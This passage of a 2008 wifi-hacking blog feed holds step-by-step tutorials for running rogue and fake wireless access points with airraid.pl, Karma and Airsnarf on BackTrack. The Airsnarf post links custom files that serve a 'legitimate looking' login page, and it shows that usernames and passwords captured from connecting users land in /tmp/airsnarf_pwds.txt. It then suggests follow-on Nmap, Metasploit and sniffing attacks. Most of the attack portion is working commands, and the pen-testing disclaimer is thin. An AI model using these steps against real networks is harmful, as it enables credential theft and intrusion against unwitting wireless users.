<p style="text-align:center;"><img class="aligncenter" src="http://images.orkut.com/orkut/albums3/ATgAAACs-n5F17ZYXjxK4YtHOxRAWNSLL80W-_MVCnHDyziGbGPGH_j7SAhTU0k8aCVWe1tF3YqnnPRFv659pHpSppUTAJtU9VD7SgRfj77CcUJ_hD4nqjK4fmMb5w.jpg" alt="" width="444" height="333" /></p>
<p style="text-align:center;">
<p style="text-align:left;">bt~#airraid.pl &#8211;interface ath0 &#8211;power 20 &#8211;wep 1</p>
<p>This one creates a bit more variety on the airwaves. This will generate fully random (wireless) MAC addresses, randomly assign WEP keys to all of the APs, vary power between 0 mW and 20 mw (or the max of the card), use a random assortment of the built-in default ESSIDs and use all available channels. Similar to the example above, this will create a nearly infinite number of APs.For testing it use</p>
<p style="text-align:left;">
<p style="text-align:center;"><img class="aligncenter" src="http://images.orkut.com/orkut/albums3/ATgAAACgFO04OUlnFpYKnYxBIcpItz9005T6hHXWuTgzUOMBxp1LVHBKz_8hnP3XXON1_5tMKfFVQoYsTni0wnV94FfgAJtU9VBTOqpUv2yl4ucEwflxlzSi8lbp9A.jpg" alt="" width="444" height="333" /></p>
<p style="text-align:center;">
<p style="text-align:left;">bt~#airodump-ng rausb0<br />
(Check all the FakeAP&#8217;s now showing encryption type as WEP)</p>
<p style="text-align:center;"><img class="aligncenter" src="http://images.orkut.com/orkut/albums3/ATgAAAAbUZXy4fUup0U-usfFyiFhpALlaBIbSgU0uPg-zKzAE03FWyn7P1t57w8We7BcEsbU2btYadbZJ22hqkNyMvZuAJtU9VBp_Huq8apEhKid07_bQVxDN-adVw.jpg" alt="" width="444" height="333" /></p>
<p style="text-align:center;">
<p style="text-align:left;">bt~#airraid.pl &#8211;interface ath0 &#8211;power 20 &#8211;gf groupfile-example.dat</p>
<p>My personal favorite. This will vary power between 0 mW and 20 mw (or the max of the card) but pull all other information from the groupfile called groupfile-example.dat which contains all the information necessary to create n bogus APs. This will cycle through these n APs in random order, sending out beacons.</p>
<p style="text-align:center;"><img class="aligncenter" src="http://images.orkut.com/orkut/albums/ATgAAADBI81--iIaVCZEECReGfa4jI_y82rHBIFm1TCXzp8NnioXNn1c0X5-VFeb5g6Q5XTfmWuV_Rc6KMM0GiqeOkbmAJtU9VCkA_w-ckrfYiNLNyjnUz-5h-fNyQ.jpg" alt="" width="444" height="333" /></p>
<p style="text-align:center;">
<p style="text-align:left;">bt~#airodump-ng rausb0<br />
(Check that FakeAP is throwing Becons randomly &amp; acting as Real AP like.)</p>
<p style="text-align:center;"><img class="aligncenter" src="http://images.orkut.com/orkut/albums3/ATgAAABCSj4blBQqRsI80hzlTkg7jPsnQHjOWlb5Ly9iZ99II78_gblaXpB5TdImPCqv-hFS1fp9xOmGtqKwn7QUP0AUAJtU9VBhcQf1Cop4B2zGo0xiDoETQRxPfQ.jpg" alt="" width="444" height="333" /></p>
<br /><img alt="" border="0" src="http://feeds.wordpress.com/1.0/categories/wifi0wn.wordpress.com/65/" /> <img alt="" border="0" src="http://feeds.wordpress.com/1.0/tags/wifi0wn.wordpress.com/65/" /> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/wifi0wn.wordpress.com/65/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/wifi0wn.wordpress.com/65/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/wifi0wn.wordpress.com/65/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/wifi0wn.wordpress.com/65/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/wifi0wn.wordpress.com/65/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/wifi0wn.wordpress.com/65/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/wifi0wn.wordpress.com/65/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/wifi0wn.wordpress.com/65/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/wifi0wn.wordpress.com/65/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/wifi0wn.wordpress.com/65/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/wifi0wn.wordpress.com/65/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/wifi0wn.wordpress.com/65/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/wifi0wn.wordpress.com/65/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/wifi0wn.wordpress.com/65/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=wifi0wn.wordpress.com&amp;blog=4155177&amp;post=65&amp;subd=wifi0wn&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://wifi0wn.wordpress.com/2008/07/22/airraidatheros-based-fakeap/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/0b82c98dce39677fe0216f2cae2a7f45?s=96&#38;d=&#38;r=G" medium="image">
			<media:title type="html">wifi0wn</media:title>
		</media:content>

		<media:content url="http://images.orkut.com/orkut/albums3/ATgAAAAVvkoLk4NSABnR42ueLWtqteBBlOR6tRuKl8VYFfjgoAdfGjqJ1bh0kc7gC4sRxVPpnWOWuOf_Mle3ObsGH32aAJtU9VAMrzN8fW3pM6gY9QoBqQPaMSfCiw.jpg" medium="image" />

		<media:content url="http://images.orkut.com/orkut/albums3/ATgAAACs-n5F17ZYXjxK4YtHOxRAWNSLL80W-_MVCnHDyziGbGPGH_j7SAhTU0k8aCVWe1tF3YqnnPRFv659pHpSppUTAJtU9VD7SgRfj77CcUJ_hD4nqjK4fmMb5w.jpg" medium="image" />

		<media:content url="http://images.orkut.com/orkut/albums3/ATgAAACgFO04OUlnFpYKnYxBIcpItz9005T6hHXWuTgzUOMBxp1LVHBKz_8hnP3XXON1_5tMKfFVQoYsTni0wnV94FfgAJtU9VBTOqpUv2yl4ucEwflxlzSi8lbp9A.jpg" medium="image" />

		<media:content url="http://images.orkut.com/orkut/albums3/ATgAAAAbUZXy4fUup0U-usfFyiFhpALlaBIbSgU0uPg-zKzAE03FWyn7P1t57w8We7BcEsbU2btYadbZJ22hqkNyMvZuAJtU9VBp_Huq8apEhKid07_bQVxDN-adVw.jpg" medium="image" />

		<media:content url="http://images.orkut.com/orkut/albums/ATgAAADBI81--iIaVCZEECReGfa4jI_y82rHBIFm1TCXzp8NnioXNn1c0X5-VFeb5g6Q5XTfmWuV_Rc6KMM0GiqeOkbmAJtU9VCkA_w-ckrfYiNLNyjnUz-5h-fNyQ.jpg" medium="image" />

		<media:content url="http://images.orkut.com/orkut/albums3/ATgAAABCSj4blBQqRsI80hzlTkg7jPsnQHjOWlb5Ly9iZ99II78_gblaXpB5TdImPCqv-hFS1fp9xOmGtqKwn7QUP0AUAJtU9VBhcQf1Cop4B2zGo0xiDoETQRxPfQ.jpg" medium="image" />
	</item>
		<item>
		<title>Karma RogueAP(Powerfull Wireless Pen-Testing Tool)</title>
		<link>http://wifi0wn.wordpress.com/2008/07/20/karma-rogueappowerfull-wireless-pen-testing-tool/</link>
		<comments>http://wifi0wn.wordpress.com/2008/07/20/karma-rogueappowerfull-wireless-pen-testing-tool/#comments</comments>
		<pubDate>Sun, 20 Jul 2008 17:17:35 +0000</pubDate>
		<dc:creator>wifi0wn</dc:creator>
				<category><![CDATA[Wifi-Hacking]]></category>
		<category><![CDATA[exploit]]></category>
		<category><![CDATA[fake ap]]></category>
		<category><![CDATA[karma]]></category>
		<category><![CDATA[pen-testing]]></category>
		<category><![CDATA[rogue AP]]></category>
		<category><![CDATA[RogueAp]]></category>
		<category><![CDATA[vulnerability]]></category>
		<category><![CDATA[wireless]]></category>

		<guid isPermaLink="false">http://wifi0wn.wordpress.com/?p=60</guid>
		<description><![CDATA[THIS WORKS WITH ATHEROS BASED CHIPSET ONLY. Project homepage: http://theta44.org/karma/index.html &#8220;KARMA is a set of tools for assessing the security of wireless clients at multiple layers. Wireless sniffing tools discover clients and their preferred/trusted networks by passively listening for 802.11 Probe Request frames. From there, individual clients can be targeted by creating a Rogue AP [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=wifi0wn.wordpress.com&amp;blog=4155177&amp;post=60&amp;subd=wifi0wn&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>THIS WORKS WITH ATHEROS BASED CHIPSET ONLY.</p>
<p>Project homepage: http://theta44.org/karma/index.html</p>
<p>&#8220;KARMA is a set of tools for assessing the security of wireless clients at multiple layers. Wireless sniffing tools discover clients and their preferred/trusted networks by passively listening for 802.11 Probe Request frames. From there, individual clients can be targeted by creating a Rogue AP for one of their probed networks (which they may join automatically) or using a custom driver that responds to probes and association requests for any SSID.  Higher-level fake services can then capture credentials or exploit client-side vulnerabilities on the host.&#8221; -http://theta44.org</p>
<p>first of all install the latest madwifi snapshots here</p>
<p><a href="http://snapshots.madwifi.org/madwifi-trunk/madwifi-trunk-r3813-20080720.tar.gz" target="_blank">http://snapshots.madwifi.org/madwifi-trunk/madwifi-trunk-r3813-20080720.tar.gz</a></p>
<p>bt ~#tar -zxvf madwifi-trunk-r3813-20080720.tar.gz</p>
<p>bt ~#cd madwifi-trunk-r3813-20080720</p>
<p>bt ~#make &amp;&amp; make install</p>
<p>bt ~ # ln -s  /sbin/iwconfig  /usr/sbin/iwconfig<br />
bt ~# ln -s  /sbin/iwpriv  /usr/sbin/iwpriv<br />
bt ~#  ln -s  /sbin/iwevent  /usr/sbin/iwevent<br />
bt ~# airmon-ng start ath0<br />
bt ~#airmon-ng start wifi0</p>
<p style="text-align:center;"><img class="aligncenter" src="http://images.orkut.com/orkut/albums3/ATgAAABPJ6O2FZIpKUzhD1JJsoB0v_mouyz5nHrpV3di2sDzFeHeytkX5RBcvpCU3YYcyYWJwzD00KoSFZdZzsjvJnFqAJtU9VBv8-XTVzG_Z1Pr4NkYuGGytZw5iQ.jpg" alt="" width="444" height="333" /></p>
<p style="text-align:center;">Putting the card into monitor mode</p>
<p>bt ~#wlanconfig ath0 destroy</p>
<p>bt ~#wlanconfig ath0 create wlandev wifi0 wlanmode master</p>
<p>goto karma directory</p>
<p style="margin-top:0;margin-bottom:0;" align="left"><strong>karma.xml<em> &#8211; </em> </strong> <em>&#8220;Runs  a rogue base station with DHCP, DNS and HTTP services.  The HTTP service  re-directs all requests to the ExampleWebExploit module that displays a simple  HTML page.  This page can be replaced with something that informs the user  that their wireless settings are insecure and that it may be a violation of  corporate policy etc&#8221;</em> <strong>-http://theta44.org</strong></p>
<p style="margin-top:0;margin-bottom:0;" align="left"><strong></strong></p>
<p>bt karma#bin/monitor-mode.sh  ath0</p>
<p>bt karma#(cd ./src/ &amp;&amp; make) &amp;&amp; ./src/karma ath0</p>
<p>bt karma#</p>
<p>bt karma#bin/karma   etc/karma.xml</p>
<p style="text-align:center;">
<p style="text-align:center;"><img class="aligncenter" src="http://images.orkut.com/orkut/albums3/ATgAAACb4biWN4l5mP_pLvkHfF5TNHIOrX9jnSzWXF8VxpArB6DXM9RPbHAXV1r8yNQT7LuFMDffreYBYWIVQvxmxInDAJtU9VCEGGZfNT17Sue4_bbU8zbCLUrfUA.jpg" alt="" width="444" height="333" /></p>
<p style="text-align:center;">Now the rogue services  are started any probing clients will now connect to KARMA on our machine  whichever SSID their machine chooses to use.</p>
<p style="text-align:center;"><img class="aligncenter" src="http://images.orkut.com/orkut/albums3/ATgAAAB1OWZLGhP30xpT0uqcfZoji_OL52a-_UMTB9nXad2Qytuj-91sePG7yDAKVPCpQgJ1dU2YzHxQojK_c8f5wBn8AJtU9VDL1hug35816S99LASgrmatY_tb3g.jpg" alt="" width="444" height="333" /></p>
<p style="text-align:center;">Iwconfig output showing ath0 working as RogueAP.we can see bssid of RogueAP</p>
<p style="text-align:center;"><img class="aligncenter" src="http://images.orkut.com/orkut/albums3/ATgAAADMGmXtytEiGyHI9Bx07oBodu6MROXdKRgwbCG96AngWCkXlz5KK0Pd6urw1FZfKp7TsaJz_M07RfYH5VBUEVWNAJtU9VAvzsxj_N1wTNpWOdMqnMdL_aGSjw.jpg" alt="" width="444" height="333" /></p>
<p style="text-align:center;">We can see our FakeAP is working now and broadcasting BSSID &amp; other clients probing for legitimate AP automatically connects with our rogueAP</p>
<p style="margin-top:0;margin-bottom:0;" align="left">
<p style="margin-top:0;margin-bottom:0;" align="left">
<p style="margin-top:0;margin-bottom:0;" align="left">
<p style="margin-top:0;margin-bottom:0;" align="left"><strong>karma-scan.xml &#8211; </strong> <em>&#8220;Attempts to find insecure wireless clients that will associate to rouge network  and possibly obtain IP address via DHCP&#8221;</em>. <strong>-http://theta44.org</strong></p>
<p style="margin-top:0;margin-bottom:0;" align="left">
<p style="margin-top:0;margin-bottom:0;" align="left">
<p style="margin-top:0;margin-bottom:0;" align="left">bt karma#bin/karma etc/karma-scan.xml</p>
<p style="margin-top:0;margin-bottom:0;" align="left">
<p style="margin-top:0;margin-bottom:0;" align="left">
<p style="margin-top:0;margin-bottom:0;" align="left">
<p style="margin-top:0;margin-bottom:0;text-align:center;" align="left"><img class="aligncenter" src="http://images.orkut.com/orkut/albums2/ATgAAAAsG3kBn51tri8se5BYzvHvr5eqBcllYhjc9RuRZSINcKZrTghT6kRkqGZ8GcnUGsSXriM1vyXhWLnJXoHEZ_c_AJtU9VCQigdzHF2_OzrDJs9GIpYCbBn8aw.jpg" alt="" width="444" height="333" /></p>
<p style="margin-top:0;margin-bottom:0;text-align:center;" align="left">karma.scan.xml</p>
<p style="margin-top:0;margin-bottom:0;text-align:center;" align="left">
<p style="margin-top:0;margin-bottom:0;text-align:left;">This tool have layer attack approach.I am still working on it so that we can lauch more attack like Nmap scanning and metasploit for exploit the known vulnerabilites.</p>
<p style="text-align:center;">
<p style="text-align:center;">
<p style="text-align:center;">
<br /><img alt="" border="0" src="http://feeds.wordpress.com/1.0/categories/wifi0wn.wordpress.com/60/" /> <img alt="" border="0" src="http://feeds.wordpress.com/1.0/tags/wifi0wn.wordpress.com/60/" /> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/wifi0wn.wordpress.com/60/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/wifi0wn.wordpress.com/60/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/wifi0wn.wordpress.com/60/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/wifi0wn.wordpress.com/60/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/wifi0wn.wordpress.com/60/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/wifi0wn.wordpress.com/60/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/wifi0wn.wordpress.com/60/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/wifi0wn.wordpress.com/60/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/wifi0wn.wordpress.com/60/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/wifi0wn.wordpress.com/60/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/wifi0wn.wordpress.com/60/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/wifi0wn.wordpress.com/60/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/wifi0wn.wordpress.com/60/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/wifi0wn.wordpress.com/60/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=wifi0wn.wordpress.com&amp;blog=4155177&amp;post=60&amp;subd=wifi0wn&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://wifi0wn.wordpress.com/2008/07/20/karma-rogueappowerfull-wireless-pen-testing-tool/feed/</wfw:commentRss>
		<slash:comments>9</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/0b82c98dce39677fe0216f2cae2a7f45?s=96&#38;d=&#38;r=G" medium="image">
			<media:title type="html">wifi0wn</media:title>
		</media:content>

		<media:content url="http://images.orkut.com/orkut/albums3/ATgAAABPJ6O2FZIpKUzhD1JJsoB0v_mouyz5nHrpV3di2sDzFeHeytkX5RBcvpCU3YYcyYWJwzD00KoSFZdZzsjvJnFqAJtU9VBv8-XTVzG_Z1Pr4NkYuGGytZw5iQ.jpg" medium="image" />

		<media:content url="http://images.orkut.com/orkut/albums3/ATgAAACb4biWN4l5mP_pLvkHfF5TNHIOrX9jnSzWXF8VxpArB6DXM9RPbHAXV1r8yNQT7LuFMDffreYBYWIVQvxmxInDAJtU9VCEGGZfNT17Sue4_bbU8zbCLUrfUA.jpg" medium="image" />

		<media:content url="http://images.orkut.com/orkut/albums3/ATgAAAB1OWZLGhP30xpT0uqcfZoji_OL52a-_UMTB9nXad2Qytuj-91sePG7yDAKVPCpQgJ1dU2YzHxQojK_c8f5wBn8AJtU9VDL1hug35816S99LASgrmatY_tb3g.jpg" medium="image" />

		<media:content url="http://images.orkut.com/orkut/albums3/ATgAAADMGmXtytEiGyHI9Bx07oBodu6MROXdKRgwbCG96AngWCkXlz5KK0Pd6urw1FZfKp7TsaJz_M07RfYH5VBUEVWNAJtU9VAvzsxj_N1wTNpWOdMqnMdL_aGSjw.jpg" medium="image" />

		<media:content url="http://images.orkut.com/orkut/albums2/ATgAAAAsG3kBn51tri8se5BYzvHvr5eqBcllYhjc9RuRZSINcKZrTghT6kRkqGZ8GcnUGsSXriM1vyXhWLnJXoHEZ_c_AJtU9VCQigdzHF2_OzrDJs9GIpYCbBn8aw.jpg" medium="image" />
	</item>
		<item>
		<title>Airsnarf-The Rogue Access-Point(BackTrack 3 As Fake AP)</title>
		<link>http://wifi0wn.wordpress.com/2008/07/19/airsnarf-the-rogue-access-pointbacktrack-3-as-fake-ap/</link>
		<comments>http://wifi0wn.wordpress.com/2008/07/19/airsnarf-the-rogue-access-pointbacktrack-3-as-fake-ap/#comments</comments>
		<pubDate>Sat, 19 Jul 2008 19:54:37 +0000</pubDate>
		<dc:creator>wifi0wn</dc:creator>
				<category><![CDATA[Wifi-Hacking]]></category>
		<category><![CDATA[access point]]></category>
		<category><![CDATA[airsnarf]]></category>
		<category><![CDATA[AP]]></category>
		<category><![CDATA[fake ap]]></category>
		<category><![CDATA[fakeap.rogueap]]></category>
		<category><![CDATA[rogue access point]]></category>
		<category><![CDATA[rogue AP]]></category>
		<category><![CDATA[wireless]]></category>

		<guid isPermaLink="false">http://wifi0wn.wordpress.com/?p=37</guid>
		<description><![CDATA[Most probably you people wont be trsuting the point that a Linux machine can act as a Access-point but its true.Atheros chipset based cards can act as Access-point or Master mode.for checking that your card support to act as an AP.I have tested it on Backtrack3 final.Using Netgear WG311T A/G/N AR 2414 Chipset (patched madwifi-ng [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=wifi0wn.wordpress.com&amp;blog=4155177&amp;post=37&amp;subd=wifi0wn&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>Most probably you people wont be trsuting the point that a Linux machine can act as a Access-point but its true.Atheros chipset based cards can act as Access-point or Master mode.for checking that your card support to act as an AP.I have tested it on Backtrack3 final.Using Netgear WG311T A/G/N AR 2414 Chipset<br />
(patched madwifi-ng drivers) with 7 dbi Antenna &amp; Linksys WUSB54GC (RT73 chipset).Netgear PCI Card I made as Rogue AP &amp; Through my other card I Scanned the avaliable AP and got the Rogue Ap Working in OPN Authentication mode.voila<br />
use this command to verify your card about Airsnarf specifications:-</p>
<p>wlanconfig ath0 create wlandev wifi0 wlanmode master/ap    #use either master or ap</p>
<p>this command makes an WIRELSS NIC acting as AP.</p>
<p>I have attached a custom coded file which makes airsnarf a truly immersive Legitimate looking AP.download it and Unzip it.<a href="http://www.4shared.com/file/55837022/a13e601c/Airsnarf_files.html" target="_blank"><strong>DOWNLOAD</strong></a></p>
<p>#replace  the file  airsnarf.cfg with /pentest/wireless/airsnarf-0.2/cfg/airsnarf.cfg</p>
<p>#For wireless interace I would recommend Atheros Chipset based cards as the airsnarf<br />
tries to make NIC card as Access point which is possible using MADWIFI-NG drivers only<br />
and those are atheros based chipset.</p>
<p>#place dhcpd.src /pentest/wireless/airsnarf-0.2/bin</p>
<p>#replace airsnarf.cgi with /pentest/wireless/airsnarf-0.2/cfg/cgi-bin/airsnarf.cgi</p>
<p>#replace my index.html in path /pentest/wireless/airsnarf-0.2/cfg/html &amp; /var/www/htdocs</p>
<p>#replace airsnarf.jpg with my airsnarf.jpg in /pentest/wireless/airsnarf-0.2/cfg/html &amp; /var/www/htdocs</p>
<p>#copy apache_pb22_ani.gif from /var/www/htdocs &amp; paste in /pentest/wireless/airsnarf-0.2/cfg/html.</p>
<p>#that is all we have done.made a legally looking webpage for login.</p>
<p>#cd /pentest/wireless/airsnarf-0.2 airsnarf0.2<br />
#./airsnarf<br />
(paswords will be store in /tmp/airsnarf_pwds.txt)</p>
<p style="text-align:center;"><a href="http://images.orkut.com/orkut/albums3/ATgAAAA_r9JW8Wkz2jch13wkIYecPetJiNcKoMqtJbXfsm4Z6fYIBmnDFBNroa3szvUTvSz8GFy55BA8CuhSrs7aHVNKAJtU9VDOoNy0GbqucE0Ee_wCN5bNxn2t5w.jpg"><img class="aligncenter" src="http://images.orkut.com/orkut/albums3/ATgAAAA_r9JW8Wkz2jch13wkIYecPetJiNcKoMqtJbXfsm4Z6fYIBmnDFBNroa3szvUTvSz8GFy55BA8CuhSrs7aHVNKAJtU9VDOoNy0GbqucE0Ee_wCN5bNxn2t5w.jpg" alt="" width="444" height="333" /></a></p>
<p style="text-align:center;">Setting the ROGUE AP name as Wifi0wn &amp; DHCP Network ID And Router IP.</p>
<p style="text-align:center;">
<p style="text-align:center;">
<p style="text-align:center;"><img class="aligncenter" src="http://images.orkut.com/orkut/albums3/ATgAAACyhRoxf3U4L8nmKkrzOgT2hqlg0iaVMhVHrjmQzsbAbk3hyTc-w9_W7sGDkIJe8c5aIrmQJBNn3O8B6O9J9oZ9AJtU9VD_bnUegTITp2CW21b7bv1iMFNyIg.jpg" alt="" width="444" height="333" /></p>
<p style="text-align:center;"><span>Starting the Airsnarf Script to Work As Rogue AP.Great tool for showing the vulnerabilites in Windows Connection manager.</span></p>
<p style="text-align:center;">
<p style="text-align:center;"><img class="aligncenter" src="http://images.orkut.com/orkut/albums3/ATgAAAD9eQ97ECis4d31D32gkb3tU2W4SXXTvYk2bMijdNe44S0TFTUOdperaOP-iPTWH_B9hCf6JaWDs4PYFf3jcPYxAJtU9VB9nf99dxPpITzspLp4Z7d6dOX7ZQ.jpg" alt="" width="444" height="333" /></p>
<p style="text-align:center;"><span>With my another USB Wireless NIC linksys WUSB54GC I am scanning the avaliable network.where I can see my fake AP is Also getting work by name wifi0wn with open authentication,54 Mbps and on channel 1.</span></p>
<p style="text-align:center;">
<p style="text-align:center;"><img class="aligncenter" src="http://images.orkut.com/orkut/albums3/ATgAAAB0IyL9y-XXWpR-uK6gseQdmrQRIqa0l4GNzewntvJAS3-acDEd4Hw3pM73I6W1wisYVBamUxKUQ4adDaXiVUr_AJtU9VA1PmN6e6sflRmLOTCbGJAE2gJSfQ.jpg" alt="" width="444" height="333" /></p>
<p style="text-align:center;"><span>now with my other card I am trying to get an IP from wifi0wn and connect without any key.</span></p>
<p style="text-align:center;">
<p style="text-align:center;"><img class="aligncenter" src="http://images.orkut.com/orkut/albums3/ATgAAAAmiolU5pk3Knhw8dig05L5gxZf-lgX0EmqaE6Q1tkkt6KSxNKHd8M5sPqBVxc2tRUO3ZBTEszyZtStgdrVHuZ_AJtU9VBHP1OQI0v--vMW0N_xTG61GGoIlg.jpg" alt="" width="444" height="333" /></p>
<p style="text-align:center;"><span>You can see that ath0 is working as an Access-point having random MAC ID and my rausb0/linksys adapter got connected with Rogue AP.</span></p>
<p style="text-align:center;">
<p style="text-align:center;"><img class="aligncenter" src="http://images.orkut.com/orkut/albums3/ATgAAAC5WQwFQKWNJwsMj99VkqdlVAfjul0MWhm7Tv_vF7tmAPD0s_Xgho_M_k48kl6M9lWkHEAtDDIBJu0NYoKg6hthAJtU9VCqbijfPkFWjOi2oHxkJPGgtMnanw.jpg" alt="" width="444" height="333" /></p>
<p style="text-align:center;"><span>In ifconfig we can see that rausb0 got IP address from the ROGUE DHCP Server of Airsnarf</span></p>
<p style="text-align:center;">
<p style="text-align:center;"><img class="aligncenter" src="http://images.orkut.com/orkut/albums2/ATgAAADd7JfZH-VfbS8mEkWD-SsoE6dh9XML0D7Yc8ielAyAMlHlg3wUTXoH1mL7fiUIjxFCRgLUArDN4u8e8Mtt8uBYAJtU9VCy9eLQ7vaE9UvrhWJ2dZiWLuiPZw.jpg" alt="" width="444" height="333" /></p>
<p style="text-align:center;"><span>Now when you will surf you will get such login-page which is totally legitimate look.thanks to me to code it and redirecting it.</span></p>
<p style="text-align:center;">
<p style="text-align:center;"><img class="aligncenter" src="http://images.orkut.com/orkut/albums3/ATcAAADrWFpuvMRu0aGieK8zfW5q6RcAo87NlyxplgEozQNDx8OSZGUA7P_iTGf-QGE_TLE3S7_Zi-toSruRUouP15FMAJtU9VDU0JBAmgkif56Gl6DLwd0zWBE7-g.jpg" alt="" width="444" height="333" /></p>
<p style="text-align:center;"><span>Redirection of url after hacking username &amp; Password.</span></p>
<p style="text-align:center;">
<p style="text-align:center;"><img class="aligncenter" src="http://images.orkut.com/orkut/albums3/ATYAAABW7XhXVwXAkI7ePJo0Xt_QRkUqZeqSDO-3S5kWA2U6mevfQPZHE7HiCYVm5LZKKZ8HNNsT-ahBy_vGaVEnta3_AJtU9VCr7DUd_yXO5EqYblTQQCURriIWAQ.jpg" alt="" width="561" height="155" /></p>
<p style="text-align:center;"><span>Default location of password is /tmp/airsnarf_pwds.txt.</span></p>
<p style="text-align:center;">
<p style="text-align:center;"><img class="aligncenter" src="http://images.orkut.com/orkut/albums3/ATcAAACCn5BhH8I1LgOfuQNPlr_0K3D4rF09S-Ldgi1jW3sf2cs-ISBribfl9sobKqesNd_OQgCyHxOMUj2opteE3ZskAJtU9VABZ3Exy8ZtLgGeDPSJNERFNexKGQ.jpg" alt="" width="444" height="333" /></p>
<p style="text-align:center;"><span>List of username along with passwords</span></p>
<p style="text-align:center;">
<p style="text-align:left;">This tool is still in progress.I am making it to work more worsely like redirecting to some website,XSS.use it for social-engineering and vulnerability assessment test.now you can show that anaware user can connect to fakeAP without their knowledge and which can leads to compromise their data.once connecting with AP now you can run the Nmap Scan along with Metapsloit Framework,sniffers like wireshark for getting HTTP,HTTPS,FTP,TELNET Passwords &amp; Many more sofisticated attacks.(USE FOR PT &amp; VA Only)</p>
<br /><img alt="" border="0" src="http://feeds.wordpress.com/1.0/categories/wifi0wn.wordpress.com/37/" /> <img alt="" border="0" src="http://feeds.wordpress.com/1.0/tags/wifi0wn.wordpress.com/37/" /> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/wifi0wn.wordpress.com/37/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/wifi0wn.wordpress.com/37/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/wifi0wn.wordpress.com/37/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/wifi0wn.wordpress.com/37/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/wifi0wn.wordpress.com/37/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/wifi0wn.wordpress.com/37/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/wifi0wn.wordpress.com/37/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/wifi0wn.wordpress.com/37/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/wifi0wn.wordpress.com/37/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/wifi0wn.wordpress.com/37/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/wifi0wn.wordpress.com/37/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/wifi0wn.wordpress.com/37/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/wifi0wn.wordpress.com/37/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/wifi0wn.wordpress.com/37/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=wifi0wn.wordpress.com&amp;blog=4155177&amp;post=37&amp;subd=wifi0wn&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://wifi0wn.wordpress.com/2008/07/19/airsnarf-the-rogue-access-pointbacktrack-3-as-fake-ap/feed/</wfw:commentRss>
		<slash:comments>6</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/0b82c98dce39677fe0216f2cae2a7f45?s=96&#38;d=&#38;r=G" medium="image">
			<media:title type="html">wifi0wn</media:title>
		</media:content>

		<media:content url="http://images.orkut.com/orkut/albums3/ATgAAAA_r9JW8Wkz2jch13wkIYecPetJiNcKoMqtJbXfsm4Z6fYIBmnDFBNroa3szvUTvSz8GFy55BA8CuhSrs7aHVNKAJtU9VDOoNy0GbqucE0Ee_wCN5bNxn2t5w.jpg" medium="image" />

		<media:content url="http://images.orkut.com/orkut/albums3/ATgAAACyhRoxf3U4L8nmKkrzOgT2hqlg0iaVMhVHrjmQzsbAbk3hyTc-w9_W7sGDkIJe8c5aIrmQJBNn3O8B6O9J9oZ9AJtU9VD_bnUegTITp2CW21b7bv1iMFNyIg.jpg" medium="image" />

